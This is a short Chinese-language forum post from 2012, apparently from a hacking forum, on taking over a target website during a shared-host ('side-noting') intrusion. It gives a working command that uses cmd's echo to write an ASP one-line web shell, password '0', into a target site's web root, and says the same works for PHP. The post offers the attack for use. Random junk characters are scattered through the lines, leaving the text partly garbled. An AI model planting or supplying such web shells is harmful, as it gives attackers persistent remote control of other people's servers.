在旁注过程中,可以执行cmd而权限又比较低的情况下,有时候可以用这个方法帮你拿下目标站。3 M# s6 i' D+ a1 J
+ [3 b. |: `5 `' ^$ R命令格式
( Y2 p+ r7 p- w" F& b* n) T! p- H; N4 N# U. a" b( M' g
Echo 语句 >目标站绝对目录- E& D) E5 u9 ^
3 [9 a) M8 U5 B, z+ l* a# i例如:
" |2 h1 N/ N1 l& q$ q/ N1 N
+ y& C# l; O- W+ c0 ~' H- @9 j Decho ^<^%execute request("0")%^> >D:\03389.com\wwwroot\YingMu.asp
9 x' }- z3 Z1 |: U. ~0 R8 x. _) T b6 | P: A
这样访问目标站的目录下就会生成一个密码为0的asp的一句话,此方法在PHP等脚本语言均适用,大家灵活发挥。; f) h/ y) W% s4 q4 m, n. X I
|
发表于 2012-9-23 14:40:24
收藏
支持
反对